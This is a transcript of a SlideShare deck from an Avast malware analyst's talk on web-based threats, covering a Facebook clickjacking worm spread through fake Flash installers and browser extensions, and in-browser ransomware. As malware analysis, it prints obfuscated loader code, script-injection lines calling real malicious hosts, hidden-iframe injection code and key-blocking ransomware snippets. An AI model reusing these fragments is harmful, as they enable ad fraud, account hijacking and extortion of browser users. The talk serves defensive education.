SlideShare a Scribd company logo

Where There's Money, There's Crime: Web-based Threats

Avast
Avast

The massive expansion of the Internet and the devices that use it to communicate is slowly but inevitably changing the lives of billions of people. Social networks are at the peak of their popularity, data is moving to the Cloud and traditional computing platforms are in recess. More and more applications are being created directly for the Web - a new platform, common to all devices. This silent revolution is causing browsers to become more important than operating systems themselves. Where there are users, there's money. Where there's money, there's crime. The Web, as a new platform, is becoming a target for cyber-attackers who abuse the OS-independent technology with malicious intentions. Anyone who uses a browser can become their victim. This presentation shows how cybercrime actually works from social engineering tactics to how browsers can be locked down with ransom demands by visiting just a single webpage. Our goal is to make the Web more secure. Help us by knowing the techniques of the enemy, recognizing scam attempts, and making your web apps resilient to future attacks. Presented by Pavel Šrámek, malware analyst at Avast, at the Web Expo 2014.

1 of 43
Web-based Threats Bezpečnostní hrozby na webu Jan Širmer Pavel Šrámek
Cybercrime landscape
Cyber-security myths Which of these myths have you heard? • I can safely open this attachment because the e-mail came from my friend • I can protect myself from malware by not going on porn/warez sites • Malware is only a problem on Windows • Malware is created by teenage geeks simply for bragging rights • Malware is created by antivirus vendors 326. 8. 2017 AVAST Viruslab
The crimeware business 426. 8. 2017 AVAST Viruslab
The crimeware business Malware authors are in it for the money • LockScreens, FakeAVs and encrypting ransomware • Banking trojans • Phishing, Identity theft • Botnets offered as a service – Spam – DDoS – CPU power (bitcoin mining, hash cracking, …) All sold on black market 526. 8. 2017 AVAST Viruslab
Traditional infection vectors The easiest way to infect a machine? Convince the user to run it himself! • social engineering Your second best bet? • zero day vulnerabilities – Java, Adobe reader, Flash • out-of-date and/or pirated OS installations • hacked websites = best free hosting  Commercial exploit kits 626. 8. 2017 AVAST Viruslab
726. 8. 2017 AVAST Viruslab Victim Compromised server Website content request Malicious JS vuln- check Get exploit code Malware C&C server Exploit + payloadinstall Malware communication Bot background service Traditional infection timeline
The new option: in-browser malware Traditional attacks target a single OS platform (mostly Win32). How to attack all platforms at once? • Use the common denominator – HTML + JS, web browser • Rich JS API, have fast engines • JS-based extensions = additional surface • Attacks come from the web anyway 826. 8. 2017 AVAST Viruslab
The new option: in-browser malware In-browser JS can do: • Click hijacking for Ad-click fraud • Worm-like spreading over social networks • Ransomware equivalent (browser lockup) • DDoS via AJAX • Even cryptocurrency mining 926. 8. 2017 AVAST Viruslab
Facebook Clickjacking
Click for me Click here! Click here! 26. 8. 2017 AVAST Viruslab 11
Option A: Native executable clicker 26. 8. 2017 AVAST Viruslab 12
Option B: Fake Flash player 26. 8. 2017 AVAST Viruslab 13
Payloads 26. 8. 2017 AVAST Viruslab 14 BHO Win32 extension JavaScript-based extensions CRXXPI
Payload in IE • Originally base64 obfuscated • Injecting BHO 26. 8. 2017 AVAST Viruslab 15
Firefox plug-in Installation 26. 8. 2017 AVAST Viruslab 16
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){ while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'w+'};c=1}; while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p} ('3639={3:12,10:12,59:9**REMOVED**;',10,110,' ||this|prefs**REMOVED**|GET'.split('|'),0,{}) ); Payloads for FF and Chrome 26. 8. 2017 AVAST Viruslab 17
this.prefService.savePrefFile(null); this.req("uri", "`||x2''zqfo8&em'b&x`x7}5", guid, 8);}}, http://likecyp.com/j.php?u=GUID&b=1&v=00001&r=RANDOM {this.req("buri", "lppt>++igq}em*gki+n*tlt;q9", g, inx);} http://videosnow1.asia/j.php?u=GUID&b=1&v=00001&r=RANDOM { xuri = this.dec(this.uri(m, uri), inx) + "" + g + "&b=1&v=k00001&r=" + Math.floor(Math.random() * 999999); } Dean unpacked 26. 8. 2017 AVAST Viruslab 18
Changes in browser settings TestAddon.buri user set string lppt >++igg}em*gki+n*tlt;q9 TestAddon.ch default string TestAddon.date user set string 1340624313 TestAddon.guid user set string 3c94f90903f031a799162872a55742e8 TestAddon.int user set string 60 TestAddon.uri user set string ‘||x2””eakzg9:&i|”b&x’x7}5 Dropped URLs • http://likecyp.com/j.php?u=GUID&b=1&v=00001&r=RANDOM • http://videosnow1.asia/j.php?u=GUID&b=1&v=00001&r=RANDOM 26. 8. 2017 AVAST Viruslab 19
The script trail document.createElement('script');s.type='text/javascr ipt';s.src='http://uhnm6.me/js_f.php?v=0.05a • Two variants of js_f.php‘s returned payload 1. Self-spreading clicker 2. Clicker only • Additional functionalities – Page Auto like – Get online friends – Solve captcha – Stealing FB credentials 26. 8. 2017 AVAST Viruslab 20
Self-spreading malware • The script updates victim’s Facebook and twitter feeds by posting new status messages 26. 8. 2017 AVAST Viruslab 21
var videos = new Array(10); videos[0] = Array("80", "Kirst*en. Dunst mastur*bating on hidden camera", "It happened in United Stateshotel", "http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "", "20", "friend", "327065014030715", "431402153539537", "AQBu92VH5GDqrJkp", "2309869772"); var flk = Array(); if ((1 == 1)) { var randomnumber = Math.floor(Math.random() * 100); if (randomnumber > 0) { ... Self-spreading malware 26. 8. 2017 AVAST Viruslab 22
Injected iframe creation function createIframe(src) { var ifr = document.createElement("iframe"); ifr.setAttribute("src", src); ifr.style.position = "absolute"; ifr.style.top = "0"; ifr.style.left = "0"; ifr.style.width = "100%"; ifr.style.height = "100%"; document.body.appendChild(ifr) } function get_img_src(src, no) { x = src.getElementsByTagName("img"); return x[no].id } function make_dom(src) { var tempDiv = document.createElement("div"); tempDiv.innerHTML = src; return tempDiv } 26. 8. 2017 AVAST Viruslab 23
Clicker • BHO, Firefox and Chrome payloads all contain a link to a site like http://resultsz.com/search/anticheat6.php?username =foreste • The site hosts a list of other sites used by all of those “clickers” for injecting hidden iframes into every visited site and earning money to the Blackhats. 26. 8. 2017 AVAST Viruslab 24
FB Clicker mini-summary
FB Clicker: Attack vector 26. 8. 2017 AVAST Viruslab 26 Exploit: ID-10-T • Method: Social engineering (celebrities, user curiosity) • Target: Largest social network Technique: Impersonation • Common masquerade – Adobe Flash Player • Trained response to plugin installation prompts  A significant portion of users will not identify the scam
FB Clicker: Technology 26. 8. 2017 AVAST Viruslab 27 Approach: Extension-based • Provides extensions for 3 major browsers • Functionality is the same Technology: Web-based where possible • IE uses native extensions (BHO = Win32 DLL) • FF and Chrome use JS-driven extensions • JavaScript code is shared  FF and Chrome attacks are OS-independent worms
In-Browser Ransomware
In-Browser Ransomware 26. 8. 2017 AVAST Viruslab 29
In-Browser Ransomware 26. 8. 2017 AVAST Viruslab 30
Geo-specific content 26. 8. 2017 AVAST Viruslab 31 function prepare_Frame(c) { ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "LEND/EN/alert.html"); ifrm.setAttribute("class", "frame"); ifrm.name = "iname"+c; ifrm.src = "LEND/EN/alert.html"; ifrm.style.display = "none"; ifrm.style.width = 0+"px"; ifrm.style.height = 0+"px"; return ifrm; //document.body.appendChild(ifrm); }
Self-protection attempt function catchControlKeys(event) { var code = event.keyCode ? event.keyCode : event.which ? event.which : null; if (event.ctrlKey) { if (code == 117) return false; // Ctrl + u if (code == 85) return false; // Ctrl + U if (code == 99) return false; // Ctrl + c if (code == 67) return false; // Ctrl + C if (code == 97) return false; // Ctrl + a if (code == 65) return false; // Ctrl + A } } 26. 8. 2017 AVAST Viruslab 32
Close Prevention 26. 8. 2017 AVAST Viruslab 33
What’s happening on the background? Repeatedattemptstoclose 26. 8. 2017 AVAST Viruslab 34
Malicious site examples 26. 8. 2017 AVAST Viruslab 35
Spread 26. 8. 2017 AVAST Viruslab 36
In-browser ransomware mini-summary
In-browser ransomware: Attack vector 26. 8. 2017 AVAST Viruslab 38 Exploit: ID-10-T again • Method: poisoned links • Target: people looking for illegal content Technique: Scares, threats, lies • Proven direct monetization scheme • Some panicked / guilty users really pay  Ransomware like any other, just faster-acting
In-browser ransomware: Technology 26. 8. 2017 AVAST Viruslab 39 Approach: Pure webpage (HTML + JS) • Server-side static pages + payment form • Later versions: Geo-targeted content Technology: JS only (client-side) • Event swallowing = lock-like functionality • Rudimentary self-protection • Easily evaded by power users (who won’t pay anyway)  Direct monetization in any modern browser!
Conclusion
Reiteration Cybersecurity scene • Financially motivated criminals • Low awareness of inner workings Facebook clicker • Worm-like spreading behavior in JS • Malicious extensions In-browser ransomware • Existing formula, new implementation • Truly cross-platform 4126. 8. 2017 AVAST Viruslab
Final thoughts: Know your foe • Bad guys will take advantage of anything • Everyone with a browser is a potential target • Average Joe’s devices have a value if compromised Web tech can be abused • Cross-platform code allows cross-platform malware • JavaScript can do a lot • Not traditional exploitation, lower security measures  Learn which kinds of attacks are possible, educate others 4226. 8. 2017 AVAST Viruslab
EOF Join the discussion with AVAST developers Follow us at Twitter and G+ @avast_devs #AVASTdevs

Recommended

Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comes
Krzysztof Kotowicz
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC Edition
Xavier Mertens
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontend
OWASP EEE
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
Francois Marier
 
Building A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail ScannerBuilding A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail Scanner
Xavier Mertens
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
Jeremiah Grossman
 
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015
Francois Marier
 
Google chrome presentation
Google chrome presentationGoogle chrome presentation
Google chrome presentationreza jalaluddin
 

Recommended

Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comes
Krzysztof Kotowicz
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC Edition
Xavier Mertens
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontend
OWASP EEE
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
Francois Marier
 
Building A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail ScannerBuilding A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail Scanner
Xavier Mertens
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
Jeremiah Grossman
 
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015
Francois Marier
 
Google chrome presentation
Google chrome presentationGoogle chrome presentation
Google chrome presentationreza jalaluddin
 
WebView security on iOS (EN)
WebView security on iOS (EN)WebView security on iOS (EN)
WebView security on iOS (EN)
lpilorz
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
Xavier Mertens
 
Web application Security
Web application SecurityWeb application Security
Web application Security
Lee C
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
Sastry Tumuluri
 
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chain
SecuRing
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
Krzysztof Kotowicz
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesYury Chemerkin
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
Krzysztof Kotowicz
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malware
Omer Meshar
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe
Stefano Di Paola
 
Advanced Malware Analysis
Advanced Malware AnalysisAdvanced Malware Analysis
Advanced Malware AnalysisPrathan Phongthiproek
 
HackAvert
HackAvertHackAvert
HackAvert
fepinette
 
Hack miami emiliocasbas
Hack miami emiliocasbasHack miami emiliocasbas
Hack miami emiliocasbasEmilio Casbas
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)OWASP Khartoum
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
Kevin Hakanson
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersFrank Kim
 
Xss mitigation php [Repaired]
Xss mitigation php [Repaired]Xss mitigation php [Repaired]
Xss mitigation php [Repaired]Tinashe Makuti
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror Stories
Simon Willison
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 

More Related Content

What's hot

WebView security on iOS (EN)
WebView security on iOS (EN)WebView security on iOS (EN)
WebView security on iOS (EN)
lpilorz
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
Xavier Mertens
 
Web application Security
Web application SecurityWeb application Security
Web application Security
Lee C
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
Sastry Tumuluri
 
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chain
SecuRing
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 

What's hot (6)

WebView security on iOS (EN)
WebView security on iOS (EN)WebView security on iOS (EN)
WebView security on iOS (EN)
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
 
Web application Security
Web application SecurityWeb application Security
Web application Security
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chain
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 

Similar to Where There's Money, There's Crime: Web-based Threats

Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
Krzysztof Kotowicz
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesYury Chemerkin
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
Krzysztof Kotowicz
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malware
Omer Meshar
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe
Stefano Di Paola
 
HackAvert
HackAvertHackAvert
HackAvert
fepinette
 
Hack miami emiliocasbas
Hack miami emiliocasbasHack miami emiliocasbas
Hack miami emiliocasbasEmilio Casbas
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)OWASP Khartoum
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
Kevin Hakanson
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersFrank Kim
 
Xss mitigation php [Repaired]
Xss mitigation php [Repaired]Xss mitigation php [Repaired]
Xss mitigation php [Repaired]Tinashe Makuti
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror Stories
Simon Willison
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
Peter Sabev
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
 
[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web Design[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web DesignChristopher Schmitt
 
Devouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scripting
gmaran23
 

Similar to Where There's Money, There's Crime: Web-based Threats (20)

Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comes
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malware
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe
 
Advanced Malware Analysis
Advanced Malware AnalysisAdvanced Malware Analysis
Advanced Malware Analysis
 
HackAvert
HackAvertHackAvert
HackAvert
 
Hack miami emiliocasbas
Hack miami emiliocasbasHack miami emiliocasbas
Hack miami emiliocasbas
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
 
Xss mitigation php [Repaired]
Xss mitigation php [Repaired]Xss mitigation php [Repaired]
Xss mitigation php [Repaired]
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror Stories
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
 
[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web Design[peachpit] Adaptive Images in Responsive Web Design
[peachpit] Adaptive Images in Responsive Web Design
 
Devouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scripting
 

More from Avast

Home Security Map of the World
Home Security Map of the World Home Security Map of the World
Home Security Map of the World
Avast
 
IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018
Avast
 
Avast @ Machine Learning
Avast @ Machine LearningAvast @ Machine Learning
Avast @ Machine Learning
Avast
 
Avast Q1 Security Report 2015
Avast Q1 Security Report 2015Avast Q1 Security Report 2015
Avast Q1 Security Report 2015
Avast
 
Korean Banks Under Pressure
Korean Banks Under PressureKorean Banks Under Pressure
Korean Banks Under Pressure
Avast
 
Every Click Counts (But All the Money Goes to Me)
Every Click Counts (But All the Money Goes to Me)Every Click Counts (But All the Money Goes to Me)
Every Click Counts (But All the Money Goes to Me)
Avast
 
Google-image poisoning: How hackers use images to spread malware
Google-image poisoning: How hackers use images to spread malwareGoogle-image poisoning: How hackers use images to spread malware
Google-image poisoning: How hackers use images to spread malware
Avast
 

More from Avast (7)

Home Security Map of the World
Home Security Map of the World Home Security Map of the World
Home Security Map of the World
 
IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018
 
Avast @ Machine Learning
Avast @ Machine LearningAvast @ Machine Learning
Avast @ Machine Learning
 
Avast Q1 Security Report 2015
Avast Q1 Security Report 2015Avast Q1 Security Report 2015
Avast Q1 Security Report 2015
 
Korean Banks Under Pressure
Korean Banks Under PressureKorean Banks Under Pressure
Korean Banks Under Pressure
 
Every Click Counts (But All the Money Goes to Me)
Every Click Counts (But All the Money Goes to Me)Every Click Counts (But All the Money Goes to Me)
Every Click Counts (But All the Money Goes to Me)
 
Google-image poisoning: How hackers use images to spread malware
Google-image poisoning: How hackers use images to spread malwareGoogle-image poisoning: How hackers use images to spread malware
Google-image poisoning: How hackers use images to spread malware
 

Recently uploaded

1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
JeyaPerumal1
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
CIOWomenMagazine
 
Latest trends in computer networking.pptx
Latest trends in computer networking.pptxLatest trends in computer networking.pptx
Latest trends in computer networking.pptx
JungkooksNonexistent
 
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shopHistory+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
laozhuseo02
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
3ipehhoa
 
Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
harveenkaur52
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
Rogerio Filho
 
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
ufdana
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Florence Consulting
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
Gal Baras
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Brad Spiegel Macon GA
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
eutxy
 
Comptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guideComptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guide
GTProductions1
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
nhiyenphan2005
 
test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
Arif0071
 
This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!
nirahealhty
 
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
3ipehhoa
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
Javier Lasa
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
keoku
 

Recently uploaded (20)

1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
